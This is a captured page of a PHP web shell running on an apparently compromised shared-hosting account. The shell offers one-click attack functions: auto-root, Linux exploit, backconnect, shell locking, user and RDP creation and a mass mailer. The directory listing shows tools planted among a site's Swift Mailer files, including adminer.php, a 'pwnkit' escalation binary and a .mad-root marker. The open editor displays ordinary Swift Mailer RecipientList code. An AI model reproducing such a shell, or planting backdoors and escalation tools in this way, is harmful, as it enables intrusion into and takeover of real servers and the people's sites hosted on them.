Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.216.43
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
tools /
swift /
Swift /
[ HOME SHELL ]
Name
Size
Permission
Action
Authenticator
[ DIR ]
drwx---r-x
Cache
[ DIR ]
drwx---r-x
Connection
[ DIR ]
drwx---r-x
Events
[ DIR ]
drwx---r-x
Iterator
[ DIR ]
drwx---r-x
Log
[ DIR ]
drwx---r-x
Message
[ DIR ]
drwx---r-x
Plugin
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
Address.php
2.12
KB
-rw----r--
AddressContainer.php
183
B
-rw----r--
Authenticator.php
877
B
-rw----r--
BadResponseException.php
549
B
-rw----r--
BatchMailer.php
5.91
KB
-rw----r--
Cache.php
1.5
KB
-rw----r--
CacheFactory.php
1.06
KB
-rw----r--
ClassLoader.php
910
B
-rw----r--
Connection.php
2.21
KB
-rw----r--
ConnectionBase.php
2.73
KB
-rw----r--
ConnectionException.php
519
B
-rw----r--
Events.php
831
B
-rw----r--
Exception.php
892
B
-rw----r--
File.php
4.42
KB
-rw----r--
FileException.php
479
B
-rw----r--
Iterator.php
993
B
-rw----r--
Log.php
3.18
KB
-rw----r--
LogContainer.php
966
B
-rw----r--
Message.php
25.8
KB
-rw----r--
RecipientList.php
5.58
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
autoload_classmap.php
0
B
-r--r--r--
index.php
1.24
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RecipientList.php
<?php /** * Swift Mailer Recipient List Container * Please read the LICENSE file * @copyright Chris Corbyn <chris@w3style.co.uk> * @author Chris Corbyn <chris@w3style.co.uk> * @package Swift * @license GNU Lesser General Public License */ require_once dirname(__FILE__) . "/ClassLoader.php"; Swift_ClassLoader::load("Swift_Address"); Swift_ClassLoader::load("Swift_Iterator_Array"); /** * Swift's Recipient List container. Contains To, Cc, Bcc * @package Swift * @author Chris Corbyn <chris@w3style.co.uk> */ class Swift_RecipientList extends Swift_AddressContainer { /** * The recipients in the To: header * @var array */ protected $to = array(); /** * The recipients in the Cc: header * @var array */ protected $cc = array(); /** * The recipients in the Bcc: header * @var array */ protected $bcc = array(); /** * Iterators to use when getting lists back out. * If any iterators are present here, their relevant "addXX()" methods will be useless. * As per the last note, any iterators need to be pre-configured before Swift::send() is called. * @var array,Swift_Iterator */ protected $iterators = array("to" => null, "cc" => null, "bcc" => null); /** * Add a recipient. * @param string The address * @param string The name * @param string The field (to, cc or bcc) */ public function add($address, $name="", $where="to") { if ($address instanceof Swift_Address) { $address_str = trim(strtolower($address->getAddress())); } elseif (is_array($address)) { foreach ($address as $a) $this->add($a, $name, $where); return; } else { $address_str = (string) $address; $address_str = trim(strtolower($address_str)); $address = new Swift_Address($address_str, $name); } if (in_array($where, array("to", "cc", "bcc"))) { $container =& $this->$where; $container[$address_str] = $address; } } /** * Remove a recipient. * @param string The address * @param string The field (to, cc or bcc) */ public function remove($address, $where="to") { if ($address instanceof Swift_Address) { $key = trim(strtolower($address->getAddress())); } else $key = trim(strtolower((string) $address)); if (in_array($where, array("to", "cc", "bcc"))) { if (array_key_exists($key, $this->$where)) unset($this->{$where}[$key]); } } /** * Get an iterator object for all the recipients in the given field. * @param string The field name (to, cc or bcc) * @return Swift_Iterator */ public function getIterator($where) { if (!empty($this->iterators[$where])) { return $this->iterators[$where]; } elseif (in_array($where, array("to", "cc", "bcc"))) { $it = new Swift_Iterator_Array($this->$where); return $it; } } /** * Override the loading of the default iterator (Swift_ArrayIterator) and use the one given here. * @param Swift_Iterator The iterator to use. It must be populated already. */ public function setIterator(Swift_Iterator $it, $where) { if (in_array($where, array("to", "cc", "bcc"))) { $this->iterators[$where] = $it; } } /** * Add a To: recipient * @param mixed The address to add. Can be a string or Swift_Address * @param string The personal name, optional */ public function addTo($address, $name=null) { $this->add($address, $name, "to"); } /** * Get an array of addresses in the To: field * The array contains Swift_Address objects * @return array */ public function getTo() { return $this->to; } /** * Remove a To: recipient from the list * @param mixed The address to remove. Can be Swift_Address or a string */ public function removeTo($address) { $this->remove($address, "to"); } /** * Empty all To: addresses */ public function flushTo() { $this->to = null; $this->to = array(); } /** * Add a Cc: recipient * @param mixed The address to add. Can be a string or Swift_Address * @param string The personal name, optional */ public function addCc($address, $name=null) { $this->add($address, $name, "cc"); } /** * Get an array of addresses in the Cc: field * The array contains Swift_Address objects * @return array */ public function getCc() { return $this->cc; } /** * Remove a Cc: recipient from the list * @param mixed The address to remove. Can be Swift_Address or a string */ public function removeCc($address) { $this->remove($address, "cc"); } /** * Empty all Cc: addresses */ public function flushCc() { $this->cc = null; $this->cc = array(); } /** * Add a Bcc: recipient * @param mixed The address to add. Can be a string or Swift_Address * @param string The personal name, optional */ public function addBcc($address, $name=null) { $this->add($address, $name, "bcc"); } /** * Get an array of addresses in the Bcc: field * The array contains Swift_Address objects * @return array */ public function getBcc() { return $this->bcc; } /** * Remove a Bcc: recipient from the list * @param mixed The address to remove. Can be Swift_Address or a string */ public function removeBcc($address) { $this->remove($address, "bcc"); } /** * Empty all Bcc: addresses */ public function flushBcc() { $this->bcc = null; $this->bcc = array(); } /** * Empty the entire list */ public function flush() { $this->flushTo(); $this->flushCc(); $this->flushBcc(); } }
Close